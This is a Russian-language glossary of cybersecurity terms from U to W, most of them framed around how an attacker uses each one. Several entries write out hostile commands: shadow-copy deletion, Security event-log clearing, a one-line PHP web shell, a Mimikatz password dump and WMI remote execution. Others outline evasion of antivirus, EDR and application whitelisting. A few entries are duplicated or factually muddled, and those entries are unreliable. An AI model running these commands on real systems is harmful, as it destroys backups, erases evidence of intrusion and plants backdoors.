UPnP (Universal Plug and Play) Протокол для автоматического обнаружения устройств в сети (маршрутизаторы, принтеры, камеры). UPnP уязвим к: DDoS-амплификации (SSDP), перенаправлению портов (вредоносные приложения могут открыть порты в маршрутизаторе). Для атакующего UPnP способ открыть порт в маршрутизаторе жертвы для получения reverse shell извне.

UPnP SSDP (Simple Service Discovery Protocol) Протокол UPnP для обнаружения устройств. SSDP используется в DDoS-амплификации: отправка запроса на SSDP-сервер с поддельным IP жертвы, сервер отвечает большим ответом. Усиление может достигать 30 раз.

Uptime Время работы системы без перезагрузки. Высокий uptime может указывать на то, что система не обновлялась (и, возможно, уязвима). Для атакующего низкий uptime может означать, что система была перезагружена после атаки (обнаружение). В threat hunting анализируют uptime для выявления аномалий.

URG (TCP Urgent Flag) Флаг TCP Urgent, указывающий на срочные данные (данные должны быть обработаны немедленно). Используется в некоторых атаках (например, для обхода IDS, создания covert channels). В сетевых атаках URG-флаг может быть использован для маскировки вредоносного трафика, так как многие системы не обрабатывают его корректно. Однако это не ключевой термин.

URL (Uniform Resource Locator) Адрес ресурса в интернете (веб-страница, файл). URL используется в: фишинге (поддельные URL), C2 (агент обращается к URL), эксфильтрации (кодирование данных в URL). Обфускация URL (сокращатели, кодирование) используется для обхода фильтров.

URL Encoding Кодирование символов в URL (процентное кодирование, %20 для пробела). Используется для: обхода фильтров (кодирование вредоносных символов), сокрытия (двойное кодирование). В XSS, SQL injection может использоваться для bypass валидации.

URL Redirection Перенаправление URL (HTTP 3xx). Используется в фишинге: после ввода данных на фишинговом сайте, жертва перенаправляется на легитимный сайт, чтобы не вызвать подозрений. Также используется в C2 для редиректа на другой домен (domain fronting).

URL Shortener Сервис сокращения URL (bit.ly, tinyurl). Используется в фишинге для сокрытия реального URL, обхода фильтров (сокращенные URL часто не блокируются). Для атакующего URL shortener способ маскировки C2 и фишинговых ссылок.

URPF (Unicast Reverse Path Forwarding) Механизм защиты от IP-spoofing, проверяющий, что входящий пакет приходит с интерфейса, через который можно отправить ответ. URPF затрудняет DDoS-амплификацию с IP-spoofing. Для атакующего URPF препятствие при использовании spoofed IP.

US-CERT (United States Computer Emergency Readiness Team) Подразделение CISA, координирующее реагирование на киберинциденты в США. Выпускает предупреждения об уязвимостях (KEV), предоставляет рекомендации.

USART (Universal Synchronous/Asynchronous Receiver-Transmitter) Расширение UART с поддержкой синхронного режима. Используется в embedded-системах. Аналогично UART, используется для физического доступа.

USB (Universal Serial Bus) Универсальная последовательная шина. USB используется для: Bad USB (Rubber Ducky) эмуляция клавиатуры; USB-дропы (baiting); загрузки с USB (Live OS, восстановление); передачи файлов. Для атакующего USB вектор физического пентеста.

USB Attack Атака через USB: Bad USB (эмуляция клавиатуры), USB-дроп (оставление зараженной флешки), USB Killer (физическое повреждение устройства), USB Rubber Ducky. USB атаки обходят сетевые защиты, требуют физического доступа.

USB Drive-By Атака, при которой вредоносное USB-устройство (Rubber Ducky) подключается к компьютеру жертвы на короткое время (например, оставляется на парковке, и жертва сама подключает). Также может быть реализовано через USB-дроп.

USB Keylogger Аппаратный кейлоггер, подключаемый между клавиатурой и компьютером. Записывает все нажатия клавиш во внутреннюю память. Используется для кражи паролей. Требует физического доступа.

USB Rubber Ducky Устройство, эмулирующее USB-клавиатуру. При подключении автоматически вводит заранее запрограммированные команды (скорость до 1000 символов в секунду). Используется для: открытия PowerShell, скачивания малвари, отключения Defender, создания пользователя. Один из основных инструментов физического пентеста.

USDP (Unified Security Data Platform) Платформа для сбора и анализа данных безопасности. Не является ключевым термином.

USGCB (United States Government Configuration Baseline) Базовые конфигурации безопасности для правительственных систем США. Системы, соответствующие USGCB, более защищены.

USMT (User State Migration Tool) Инструмент Microsoft для переноса данных пользователя. Может быть использован для кражи данных, если есть доступ.

USR (User) Пользователь.

UTC (Coordinated Universal Time) Всемирное координированное время. В логах события часто записываются в UTC. Для атакующего важно учитывать часовые пояса при анализе логов и планировании действий.

UTM (Unified Threat Management) Унифицированное управление угрозами устройства, объединяющие firewall, IDS/IPS, VPN, антивирус, фильтрацию веб-трафика. Для атакующего UTM препятствие: нужно обходить несколько слоев защиты.

UUT (Unit Under Test) Тестируемый блок (Unit Under Test) в разработке ПО, тестировании. В контексте атак не является термином.

UVM (Universal Virtual Machine) Универсальная виртуальная машина (Universal Virtual Machine) термин из области виртуализации. В контексте атак не является термином.

V

VBA (Visual Basic for Applications) Язык программирования, встроенный в Microsoft Office (Word, Excel, PowerPoint, Outlook). VBA используется для создания макросов автоматизации задач. Для атакующего VBA классический вектор доставки малвари: жертве приходит документ (Word, Excel) с вредоносным макросом, который при открытии и включении макросов (или через социальную инженерию) скачивает и запускает малварь. В 2026 макросы по умолчанию отключены, но атакующие используют: убеждение включить макросы (социальная инженерия), эксплуатацию уязвимостей в VBA (CVE-2017-11882), или другие векторы (ClickFix). VBA-макросы могут быть обфусцированы для обхода антивирусов.

VBA Stomping Техника обхода антивирусов, анализирующих VBA-макросы. VBA Stomping заключается в удалении или повреждении исходного кода VBA (P-Code), оставляя только скомпилированный код (p-code), который выполняется, но не анализируется некоторыми антивирусами. Используется для доставки малвари через документы Office.

VBS (VBScript) Скриптовый язык Windows (Visual Basic Script). VBScript используется для автоматизации задач, в том числе в фишинговых документах (как альтернатива VBA). VBS может выполняться через wscript.exe или cscript.exe. Атакующие используют VBS для: скачивания малвари, создания persistence, выполнения команд. VBS часто обфусцирован для обхода детектов.

VBScript См. VBS. VBScript (Visual Basic Script) скриптовый язык Windows, выполняемый через wscript.exe или cscript.exe. VBS используется для автоматизации, в фишинговых документах (как альтернатива VBA). VBS может быть использован для: скачивания малвари, создания persistence, выполнения команд. VBS часто обфусцирован для обхода детектов.

VCF (vCard) Формат файла для электронных визитных карточек. VCF может содержать вредоносные ссылки или использоваться в фишинге. Не является ключевым вектором.

VDS (Virtual Dedicated Server) Виртуальный выделенный сервер (аналог VPS). Используется для хостинга C2, эксфильтрации. VDS предпочтительнее shared hosting для операций, требующих изоляции.

VDSL (Very-high-bit-rate Digital Subscriber Line) Технология высокоскоростного интернета по телефонной линии (Very-high-bit-rate Digital Subscriber Line). В контексте атак не является термином.

VE (Virtual Environment) Виртуальная среда (VMware, VirtualBox). Для атакующего VE среда для анализа малвари (sandbox) или для запуска инструментов. Малварь использует анти-сэндбокс техники для обнаружения VE.

VEC (Virus Encyclopedia) Энциклопедия вирусов (например, от антивирусных вендоров). Используется для изучения TTPs.

VEEAM Производитель ПО для резервного копирования (Veeam Backup & Replication). Veeam цель для атакующих: уничтожение бэкапов (через компрометацию сервера Veeam) ключевой этап перед ransomware. Уязвимости Veeam (CVE-2023-27532) эксплуатировались для кражи учетных данных. Для атакующего Veeam препятствие, если защищен.

VGA (Video Graphics Array) Стандарт видеовыхода (Video Graphics Array). В контексте атак VGA может быть целью для атак через видеокарту (например, извлечение данных через VGA-порт, атаки на графические драйверы). Однако не является ключевым термином.

VHD (Virtual Hard Disk) Формат виртуального диска (Microsoft). VHD-файлы могут содержать малварь. Атакующие могут монтировать VHD и запускать малварь, обходя некоторые детекты (файл не распознается как исполняемый).

VHDX Расширенный формат VHD (Hyper-V). Аналогично VHD.

VHS (Virtual Hosting Service) Услуга виртуального хостинга. Не является ключевым термином.

VIA (Virtual Interface Architecture) Архитектура виртуальных интерфейсов (Virtual Interface Architecture) стандарт для высокопроизводительных сетей (InfiniBand, iWARP). В контексте атак не является термином.

VIF (Virtual Interface) Виртуальный сетевой интерфейс (в VMware, VirtualBox). Используется для изоляции VM.

VIM (Vi IMproved) Текстовый редактор в Unix/Linux. VIM может быть использован для: редактирования файлов конфигурации, создания скриптов. VIM имеет уязвимости (CVE-2022-4292), которые могут привести к RCE.

VIN (Vehicle Identification Number) Идентификационный номер транспортного средства. В контексте атак VIN может быть использован для OSINT (история автомобиля), а также для атак на автомобильные системы (CAN bus). Для атакующего автомобили цель для взлома через OBD-II порт, Bluetooth, телематику.

VIP (Very Important Person) Цель whaling (атака на высокопоставленных лиц). Компрометация VIP может дать доступ к конфиденциальной информации, финансовым полномочиям.

Virtual Desktop Infrastructure (VDI) Виртуализация рабочих столов (Citrix, VMware Horizon, Azure Virtual Desktop). VDI используется в корпоративной среде для удаленной работы. Для атакующего VDI цель: компрометация VDI может дать доступ к сотням рабочих столов. VDI часто имеет слабую защиту сессий.

Virtual Machine (VM) Виртуальная машина (VMware, VirtualBox, Hyper-V, KVM). VM используются для: изоляции малвари (sandbox), запуска C2, эмуляции сред. Для атакующего VM среда для анализа (и анти-сэндбокс техники) и цель для VM escape (побег из VM на хост).

Virtual Machine Escape (VM Escape) Побег из виртуальной машины (guest) на хост-систему (hypervisor) через уязвимость в гипервизоре. VM Escape дает атакующему контроль над хостом и всеми другими VM. Примеры: CVE-2019-2525 (VMware), CVE-2020-1530 (Hyper-V). Для атакующего VM Escape способ изолированную среду превратить в точку компрометации всей инфраструктуры.

Virtual Network Computing (VNC) Протокол удаленного рабочего стола (аналог RDP). VNC используется для администрирования. Уязвимости VNC: слабые пароли, отсутствие шифрования (VNC без TLS). Атакующие используют VNC для lateral movement.

Virtual Private Cloud (VPC) Изолированная виртуальная сеть в облаке (AWS VPC, Azure VNet, GCP VPC). VPC сегментирует сети, ограничивает доступ. Для атакующего VPC препятствие: нужно найти пути между VPC (VPN, peering, over-privileged IAM).

Virtual Private Network (VPN) Виртуальная частная сеть (Virtual Private Network) зашифрованный туннель между устройством и VPN-сервером, скрывающий IP-адрес и защищающий трафик. Протоколы: OpenVPN, WireGuard, IPsec, L2TP. VPN используется для: анонимизации (скрытие IP), обхода геоблокировок, защиты от перехвата. Для атакующего VPN инструмент для сокрытия C2, доступа к внутренним сетям (компрометация VPN-учетных данных). В корпоративных средах VPN точка входа (initial access) при слабых паролях или отсутствии MFA.

Virtual Server Виртуальный сервер (VPS). Используется для: C2, эксфильтрации, прокси. Для атакующего VPS основная инфраструктура, регистрируемая на burner identity, оплаченная криптовалютой.

VirtualBox Продукт для виртуализации от Oracle. VirtualBox используется для: запуска VM, sandbox, анализа малвари. Уязвимости VirtualBox (CVE-2020-26878) могут привести к VM escape.

Virtualization Виртуализация (аппаратная, программная). Для атакующего virtualization среда для изоляции (sandbox), цель для VM escape, инструмент для запуска нескольких ОС на одном железе.

Virus Вирус тип вредоносного ПО, способный к самовоспроизведению (копированию себя) и распространению на другие файлы, компьютеры. В отличие от червя (worm), вирус требует участия пользователя для распространения (запуск зараженной программы). В 2026 вирусы как отдельный класс встречаются реже, заменены троянами, инфостилерами, ransomware.

VirusTotal Онлайн-сервис для проверки файлов на вирусы, использующий более 70 антивирусных движков. VirusTotal используется защитниками для анализа подозрительных файлов. Для атакующего VirusTotal угроза: если малварь загружена в VirusTotal, она становится известной антивирусам в течение часов. Для обхода используются: проверка, не проверяется ли файл в VirusTotal (через API), уникальные билды под каждую жертву, полиморфизм.

Vishing (Voice Phishing) Голосовой фишинг: атака по телефону, при которой злоумышленник представляется сотрудником техподдержки, банка, IT-отдела и убеждает жертву сообщить пароль, код MFA, установить удаленный доступ (AnyDesk, TeamViewer) или перевести деньги. The Com (Scattered Spider) специализируется на vishing в helpdesk: звонок "я сотрудник, потерял доступ", убеждают сбросить MFA. Vishing использует социальную инженерию, иногда с deepfake голосом (имитация руководителя).

VLAN (Virtual Local Area Network) Виртуальная локальная сеть, разделяющая физическую сеть на изолированные сегменты. VLAN используется для сегментации, изоляции трафика. Атаки на VLAN: VLAN hopping (переход между VLAN через двойное тегирование, switch spoofing). Для атакующего VLAN hopping способ перейти из одного сегмента в другой.

VLAN Hopping Техника перехода между VLAN: атакующий подключается к порту коммутатора, настроенному как trunk, или отправляет пакеты с двумя VLAN-тегами (double tagging). Используется для доступа к трафику других VLAN.

VLAN Tagging Добавление VLAN-тега (802.1Q) к пакету для идентификации VLAN. Двойное тегирование используется в VLAN hopping.

VLSM (Variable Length Subnet Mask) Маска подсети переменной длины (Variable Length Subnet Mask) метод разделения IP-сети на подсети разного размера. В контексте атак VLSM используется при network mapping для понимания структуры сети. Это базовый сетевой термин.

VMDK (Virtual Machine Disk) Формат виртуального диска VMware. VMDK-файлы содержат данные виртуальной машины. Ransomware, нацеленный на ESXi (Qilin, BlackCat), шифрует VMDK-файлы, останавливая VM. Для атакующего VMDK цель для шифрования или кражи.

VMFS (Virtual Machine File System) Файловая система VMware для хранения VM. VMFS может быть целью атак на хранилище.

VMware Компания, разработчик продуктов виртуализации (ESXi, vSphere, Workstation). VMware широко используется в корпоративной среде. Уязвимости VMware (CVE-2021-21972, CVE-2021-21985) эксплуатировались для RCE. Для атакующего VMware цель для initial access (vCenter, ESXi) и VM escape.

VMware ESXi Гипервизор VMware (bare-metal). ESXi используется для виртуализации серверов. Атаки на ESXi: ransomware (шифрование VMDK), эксплуатация уязвимостей (CVE-2021-21972), компрометация через vCenter. Qilin, BlackCat поддерживают шифрование ESXi.

VMware Tools Набор утилит для гостевой ОС VMware. Может быть использован для: передачи файлов между хостом и гостем, выполнения команд. Уязвимости VMware Tools могут привести к VM escape.

VMware vCenter Централизованная платформа управления VMware (vCenter Server). vCenter цель для атак: компрометация vCenter дает управление всеми ESXi-хостами. Уязвимости vCenter (CVE-2021-21972) эксплуатировались для RCE.

VNC (Virtual Network Computing) Протокол удаленного рабочего стола (Virtual Network Computing), аналог RDP. VNC используется для администрирования. Уязвимости VNC: слабые пароли, отсутствие шифрования (VNC без TLS), уязвимости в реализации. Атакующие используют VNC для lateral movement.

VoIP (Voice over IP) Технология передачи голоса по IP-сети (SIP, RTP). Атаки на VoIP: перехват звонков, DoS (SIP flood), фрод (мошеннические звонки), подмена Caller ID (для vishing). В vishing атакующие могут подменять номер (Caller ID spoofing), чтобы выглядеть как внутренний номер организации.

Volatility Open-source фреймворк для анализа дампов памяти (memory forensics). Volatility извлекает из дампов памяти: активные процессы, сетевые соединения, пароли, ключи шифрования, внедренные DLL. Для атакующего Volatility инструмент защитников, может быть использован для анализа его следов в памяти. Для обхода используется минимизация следов (шифрование, короткое время жизни).

VolP (Voice over IP) См. VoIP. Voice over IP (VoIP) технология передачи голоса по IP-сети (SIP, RTP). Атаки на VoIP: перехват звонков, DoS (SIP flood), фрод (мошеннические звонки), подмена Caller ID (для vishing). В vishing атакующие могут подменять номер (Caller ID spoofing), чтобы выглядеть как внутренний номер организации.

Volume Shadow Copy (VSS) Теневая копия (Volume Shadow Copy) в Windows механизм создания снимков (snapshots) файлов и томов для восстановления. VSS используется для: бэкапов (System Restore, Windows Backup), создания теневых копий перед установкой обновлений. Для атакующего VSS угроза: жертва может восстановить файлы после шифрования. В атаках ransomware первым делом удаляют теневые копии командами: vssadmin delete shadows /all /quiet, wmic shadowcopy delete, или через PowerShell. VSS также может быть использован для дампа NTDS.dit (базы Active Directory) без остановки служб.

VPN (Virtual Private Network) Виртуальная частная сеть зашифрованный туннель между устройством и VPN-сервером, скрывающий IP-адрес и защищающий трафик. Протоколы: OpenVPN, WireGuard, IPsec, L2TP. VPN используется для: анонимизации (скрытие IP), обхода геоблокировок, защиты от перехвата. Для атакующего VPN инструмент для сокрытия C2, доступа к внутренним сетям (компрометация VPN-учетных данных). В корпоративных средах VPN точка входа (initial access) при слабых паролях или отсутствии MFA.

VPN Filter Малварь, заражающая маршрутизаторы (Linksys, TP-Link, Netgear). VPN Filter использовалась для сбора трафика, кражи данных, создания ботнета. В 2026 legacy.

VPS (Virtual Private Server) Виртуальный выделенный сервер (VPS). Используется для: C2, эксфильтрации, прокси, hosting leak sites. Для атакующего VPS основная инфраструктура, регистрируемая на burner identity, оплаченная криптовалютой. VPS провайдеры: DigitalOcean, Vultr, Hetzner, а также bulletproof hosting (не реагирующий на жалобы).

VSA (Virtual Storage Access) Виртуальный доступ к хранилищу (Virtual Storage Access) термин из области виртуализации хранения. В контексте атак не является термином.

VSS (Volume Shadow Copy) См. Shadow Copy. Теневая копия (Volume Shadow Copy) в Windows механизм создания снимков (snapshots) файлов и томов для восстановления. Shadow Copy используется для бэкапов (System Restore, Windows Backup). Для атакующего shadow copy угроза: жертва может восстановить файлы после шифрования. В атаках ransomware первым делом удаляют shadow copies командами: vssadmin delete shadows /all /quiet, wmic shadowcopy delete, или через PowerShell.

VSTO (Visual Studio Tools for Office) Платформа для разработки надстроек Office (Add-ins). VSTO надстройки могут быть использованы для распространения малвари (аналогично VBA). Надстройки могут быть установлены через магазин Office или локально. Для атакующего VSTO альтернатива VBA для доставки.

VTF (Virtual Tape Format) Формат виртуальной ленты для бэкапов. Атаки на виртуальные ленты: уничтожение данных.

Vulnerability Уязвимость недостаток в программном или аппаратном обеспечении, который может быть использован для нарушения безопасности (RCE, LPE, DoS, information disclosure). Уязвимости классифицируются по CVSS. Для атакующего vulnerability точка входа, инструмент для эксплуатации. Виды: 0-day (нет патча), 1-day (патч вышел), N-day (старая, но не исправленная).

Vulnerability Assessment Оценка уязвимостей процесс выявления уязвимостей в системах (сканирование, анализ конфигураций). Используется защитниками. Для атакующего vulnerability assessment часть рекогносцировки (поиск целей).

Vulnerability Disclosure Раскрытие информации об уязвимости. Responsible disclosure уязвимость сообщается вендору, исправляется, затем публикуется. Full disclosure публикация сразу. Для атакующего disclosure означает, что уязвимость становится публичной (1-day), и нужно атаковать непропатченные системы.

Vulnerability Management Управление уязвимостями процесс идентификации, оценки, исправления уязвимостей. Плохой vulnerability management признак легкой цели.

VX (Virus Exchange) Группы и форумы для обмена вредоносным ПО (VX Underground). Используются для распространения малвари, обмена кодами, обучения.

VX Underground Сообщество, посвященное вредоносному ПО, исследованиям. VX Underground публикует образцы малвари, статьи, инструменты. Для атакующего VX Underground ресурс для изучения техник.

W

W3C (World Wide Web Consortium) Консорциум, разрабатывающий стандарты веба (HTML, CSS, XML, DOM, WebAuthn). В контексте атак W3C важен, потому что определяет спецификации, которые могут содержать уязвимости (например, CORS, CSP). Для атакующего понимание W3C-стандартов помогает в exploitation веб-приложений (обход политик, манипуляция DOM).

WAF (Web Application Firewall) Межсетевой экран для веб-приложений, анализирующий HTTP-трафик и блокирующий атаки (SQL injection, XSS, CSRF). WAF может быть облачным (Cloudflare, AWS WAF) или локальным (ModSecurity, F5 ASM). Для атакующего WAF препятствие: нужно обходить через обфускацию payload, разделение запросов, атаки на бизнес-логику (которые WAF не видит), эксплуатацию уязвимостей самого WAF.

WAN (Wide Area Network) Глобальная сеть (между городами, странами). В контексте атак WAN среда, через которую проходят C2-коммуникации. Атаки на WAN: BGP hijacking, DNS poisoning, DDoS на провайдеров.

WannaCry Ransomware-червь (2017), распространявшийся через уязвимость EternalBlue (CVE-2017-0144) в SMB. WannaCry зашифровал сотни тысяч компьютеров по всему миру, включая NHS (Великобритания). WannaCry использовал kill switch (домен, который был зарегистрирован и остановил распространение). В 2026 WannaCry исторический пример, демонстрирующий опасность непропатченных систем и скорость распространения червей.

WAP (Wireless Access Point) Точка доступа Wi-Fi. Атаки на WAP: Evil Twin (поддельная точка доступа), KRACK (уязвимость WPA2), деавторизация (deauth attack). Для атакующего WAP точка входа в беспроводную сеть.

WAR (Web Archive) Формат архива веб-приложений для Java (Web Application Archive). WAR-файлы могут содержать backdoor (webshell). Для атакующего загрузка WAR-файла через уязвимость загрузки файлов способ получить webshell на Java-сервере (Tomcat, JBoss).

Warez Пиратское ПО, распространяемое через торренты, форумы, FTP. Warez-сайты источник малвари (инфостилеры в "cracked software"). Для атакующего warez вектор распространения (размещение зараженных "кряков" на популярных ресурсах).

WAS (Web Application Scanner) Сканер уязвимостей веб-приложений (Acunetix, Burp Suite, OWASP ZAP). Для атакующего WAS инструмент для поиска уязвимостей в целевых приложениях.

WASM (WebAssembly) Бинарный формат для выполнения кода в браузере (альтернатива JavaScript). WebAssembly может быть использован для: скрытой малвари (быстрее, сложнее анализировать), криптомайнинга, обхода детектов. Для атакующего WASM новый вектор для client-side атак.

WAV (Waveform Audio File Format) Аудиоформат. WAV-файлы могут содержать стеганографию (скрытые данные), использоваться для C2 (данные в аудио), или быть частью фишинга (вложение). Для атакующего WAV контейнер для скрытых данных.

WCF (Windows Communication Foundation) Фреймворк Microsoft для построения сервисов. WCF использует различные протоколы (HTTP, TCP, MSMQ). Уязвимости WCF могут привести к RCE, DoS.

WDAC (Windows Defender Application Control) Механизм Windows, ограничивающий запуск приложений (белые списки, аналогично AppLocker). WDAC (ранее Device Guard) разрешает выполнение только подписанных или доверенных приложений. Для атакующего WDAC препятствие: нужно использовать доверенные приложения (LOLBins) или обходить через уязвимости.

WDigest Протокол аутентификации Windows, хранящий пароли в памяти LSASS в открытом виде (plaintext). WDigest используется для аутентификации по протоколу HTTP Digest. В Windows 8.1/10 и Server 2012 R2+ WDigest по умолчанию отключен, но может быть включен через реестр. Для атакующего включенный WDigest золотая жила: Mimikatz (sekurlsa::wdigest) извлекает пароли в открытом виде.

Web Application Firewall (WAF) Межсетевой экран для веб-приложений (Web Application Firewall), анализирующий HTTP-трафик и блокирующий атаки (SQL injection, XSS, CSRF). WAF может быть облачным (Cloudflare, AWS WAF) или локальным (ModSecurity, F5 ASM). Для атакующего WAF препятствие: нужно обходить через обфускацию payload, разделение запросов, атаки на бизнес-логику (которые WAF не видит), эксплуатацию уязвимостей самого WAF.

Web Shell Скрипт (PHP, ASP, JSP, Python), загруженный на веб-сервер, позволяющий выполнять команды через HTTP. Web shell используется для persistence, C2, доступа к файловой системе. Пример PHP webshell: <?php system($_GET['cmd']); ?>. Web shell может быть замаскирован под легитимный файл (error.php, image.php). Обнаруживается через сканирование файловой системы, анализ логов.

WebDAV (Web Distributed Authoring and Versioning) Расширение HTTP для удаленного управления файлами (PUT, DELETE, PROPFIND). WebDAV используется для загрузки файлов на сервер. Атаки: загрузка web shell (если разрешен PUT), directory traversal.

WebSocket Протокол двунаправленной связи поверх TCP (RFC 6455), используемый в веб-приложениях для real-time коммуникации. WebSocket используется для: C2 (постоянное соединение, отправка команд), туннелирования, обхода firewalls (трафик похож на HTTP upgrade). WebSocket-соединения могут быть скрыты среди легитимного трафика.

WebSockets Протокол двунаправленной связи поверх TCP (WebSocket), используемый в веб-приложениях для real-time коммуникации. WebSocket используется для: C2 (постоянное соединение, отправка команд), туннелирования, обхода firewalls (трафик похож на HTTP upgrade). WebSocket-соединения могут быть скрыты среди легитимного трафика.

WEP (Wired Equivalent Privacy) Устаревший протокол шифрования Wi-Fi, взломанный в 2001 (слабый RC4). WEP может быть взломан за минуты (атака сбора пакетов, ARP replay). В 2026 WEP не используется, но может встречаться в старых IoT-устройствах.

WF (Windows Firewall) Встроенный межсетевой экран Windows. Для атакующего Windows Firewall препятствие: блокирует входящие соединения (reverse shell). Обход: использование разрешенных портов (80, 443), исходящих соединений, отключение firewall через PowerShell (требует прав администратора).

WFP (Windows Filtering Platform) Платформа фильтрации пакетов Windows, используемая антивирусами, межсетевыми экранами. WFP может быть использована для: фильтрации трафика, сокрытия C2 (через WFP-драйвер). Для атакующего WFP цель для отключения или обхода.

Whaling Разновидность spear-phishing, нацеленная на "китов" высокопоставленных лиц (CEO, CFO, C-level). Цель whaling BEC (Business Email Compromise): подделка письма от руководителя с просьбой перевести деньги, отправить конфиденциальные данные. Whaling использует OSINT (LinkedIn, корпоративные сайты) для подготовки персонализированных писем. В 2026 whaling включает deepfake видео/голоса: звонок от "гендиректора" с просьбой срочно перевести средства.

WhisperGate Wiper-малварь, использовавшаяся в атаке на украинские правительственные сайты (2022). WhisperGate уничтожала MBR (Master Boot Record) и файлы. В 2026 WhisperGate пример destructive атаки, маскирующейся под ransomware.

White Hat Этичный хакер специалист по безопасности, работающий с разрешения владельцев систем, выявляющий уязвимости, тестирующий защиту. White hat участвуют в bug bounty программах, работают в пентест-компаниях. В отличие от black hat, white hat не нарушает закон и не использует найденные уязвимости во вред.

White Listing Белые списки разрешенные приложения, IP-адреса, домены. AppLocker, WDAC механизмы белых списков. Для атакующего white listing препятствие: нужно использовать приложения, входящие в белый список (LOLBins), или обходить через уязвимости.

WHOIS Протокол для получения информации о владельце домена или IP-адреса (регистратор, дата регистрации, контактные данные). WHOIS используется в OSINT для: сбора информации о цели, поиска доменов, связанных с атакующими (по email, имени). Для атакующего WHOIS угроза, если домены зарегистрированы без анонимизации (privacy protection).

Wi-Fi Беспроводная сеть (стандарт 802.11). Атаки на Wi-Fi: KRACK (уязвимость WPA2), Evil Twin (поддельная точка доступа), deauth attack (отключение клиентов), WPS PIN брутфорс. Для атакующего Wi-Fi точка входа в беспроводную сеть организации, вектор для MITM.

Wi-Fi Deauthentication Attack Атака деавторизации: отправка deauth-пакетов от имени точки доступа для отключения клиента от Wi-Fi. Используется для: принудительного повторного подключения для захвата handshake (для взлома WPA/WPA2), DoS, перенаправления на Evil Twin.

Wi-Fi Protected Access (WPA/WPA2/WPA3) Протоколы защиты Wi-Fi. WPA2 (AES) уязвим к KRACK (CVE-2017-13077). WPA3 (SAE) устойчивее к offline-атакам, но имеет уязвимости (dragonblood). Для атакующего взлом WPA/WPA2 требует захвата handshake и offline-брутфорса (Hashcat).

WIA (Windows Image Acquisition) API для работы со сканерами и камерами. Уязвимости WIA могут привести к RCE.

Wigle (WiGLE) Сайт и приложение для сбора данных о беспроводных сетях (SSID, BSSID, геолокация). Wigle используется в OSINT для: поиска точек доступа в целевой организации (включая скрытые), определения местоположения, mapping сетей.

Win32 API API Windows (Win32) набор функций для работы с системой (файлы, процессы, реестр, сеть). Для атакующего Win32 API основной интерфейс для: создания процессов (CreateProcess), инъекции кода (WriteProcessMemory, CreateRemoteThread), работы с реестром (RegSetValueEx), файловой системой. EDR ставят хуки на Win32 API.

WinDBG (Windows Debugger) Отладчик Windows, используемый для анализа crash dumps, отладки драйверов, реверс-инжиниринга. WinDBG может быть использован для анализа малвари (вручную). Для атакующего WinDBG инструмент защитников, может быть использован для изучения его малвари.

Windows Defender Встроенный антивирус Windows (Defender AV) и EDR (Microsoft Defender for Endpoint). Defender включает: антивирус, ASR (Attack Surface Reduction), AMSI, контроль приложений. Для атакующего Defender препятствие: требует AMSI bypass, ETW unhooking, direct syscalls, отключения через реестр (если есть права администратора).

Windows Defender Application Control (WDAC) Механизм Windows, ограничивающий запуск приложений (Windows Defender Application Control, белые списки). WDAC (ранее Device Guard) разрешает выполнение только подписанных или доверенных приложений. Для атакующего WDAC препятствие: нужно использовать доверенные приложения (LOLBins) или обходить через уязвимости.

Windows Defender Firewall См. WF. Windows Firewall встроенный межсетевой экран Windows. Для атакующего Windows Firewall препятствие: блокирует входящие соединения (reverse shell). Обход: использование разрешенных портов (80, 443), исходящих соединений, отключение firewall через PowerShell (требует прав администратора).

Windows Event Log Журнал событий Windows (Application, Security, System). Security Event Log содержит записи о входах, изменениях прав, запуске процессов. Для атакующего Event Log источник улик, который нужно чистить (wevtutil cl Security, PowerShell Clear-EventLog). Interlock использовал агрессивное удаление логов через cron-задачи.

Windows Filtering Platform (WFP) Платформа фильтрации пакетов Windows (Windows Filtering Platform), используемая антивирусами, межсетевыми экранами. WFP может быть использована для: фильтрации трафика, сокрытия C2 (через WFP-драйвер). Для атакующего WFP цель для отключения или обхода.

Windows Management Instrumentation (WMI) Инфраструктура управления Windows (Windows Management Instrumentation). WMI используется для: сбора информации о системе (Win32_Process, Win32_Service), удаленного выполнения команд, persistence (WMI Event Subscription), lateral movement. WMI работает через RPC (порт 135). Атакующие используют WMI для: выполнения команд (wmic process call create), сбора данных, создания скрытых backdoor (WMI Event Subscription).

Windows Registry Реестр Windows центральная база данных конфигураций. Используется для: persistence (run keys, services), отключения защиты (DisableAntiSpyware), хранения паролей (LSA Secrets). Для атакующего реестр инструмент для модификации системы.

Windows Script Host (WSH) Среда выполнения скриптов Windows (VBS, JS). WSH используется для: запуска скриптов (cscript.exe, wscript.exe), автоматизации. Атакующие используют WSH для выполнения малвари (например, через .vbs файлы).

Windows Subsystem for Linux (WSL) Подсистема Windows для запуска Linux-бинарников. WSL может быть использован для: запуска Linux-инструментов на Windows (nmap, Metasploit), C2, persistence. Для атакующего WSL способ использовать Linux-инструменты без VM.

Windows Terminal Современный эмулятор терминала от Microsoft. ClickFix эволюционировал от использования Win+R (Run) к Windows Terminal для вставки вредоносных скриптов.

WinHttp API для HTTP-запросов в Windows. Используется в малвари для C2-коммуникаций (HTTP/HTTPS). Альтернатива WinINet.

WinINet API для HTTP-запросов в Windows (Internet Explorer). Используется в малвари, но WinHttp предпочтительнее для C2 (меньше зависимостей от браузера).

WinLogon Процесс Windows, отвечающий за вход в систему. WinLogon может быть целью для persistence (замена или модификация).

WinPcap Библиотека для захвата сетевых пакетов (Windows). Используется в Wireshark, Nmap. Для атакующего WinPcap может быть установлен легитимно, но также может быть использован для сниффинга.

WinRAR Архиватор, популярный в Windows. Уязвимости WinRAR (CVE-2018-20250) использовались для выполнения кода через ACE-архивы (path traversal). Для атакующего WinRAR вектор для распространения малвари (зараженные архивы на crack-сайтах).

WinRM (Windows Remote Management) Удаленное управление Windows на основе WS-Management (порт 5985/5986). WinRM используется для: удаленного выполнения команд (PowerShell Remoting), управления серверами. Для атакующего WinRM инструмент lateral movement (Invoke-Command, Enter-PSSession). WinRM требует аутентификации.

Winsock API для сетевых операций в Windows (сокеты). Используется в малвари для C2-коммуникаций (raw TCP, UDP).

Wiper Вредоносное ПО, предназначенное для безвозвратного уничтожения данных (data wiping). Wiper не требует выкупа, цель disruption. Примеры: NotPetya, WhisperGate, Shamoon, Handala (Stryker). Wiper может маскироваться под ransomware, но ключи шифрования уничтожены. Handala использовала Intune как wiper: массовая команда factory reset уничтожила 200k устройств Stryker без малвари.

WireGuard Современный VPN-протокол с открытым кодом (UDP), более быстрый и безопасный, чем OpenVPN. WireGuard используется для: анонимизации, защиты C2, доступа к внутренним сетям. Для атакующего WireGuard инструмент для создания скрытых туннелей.

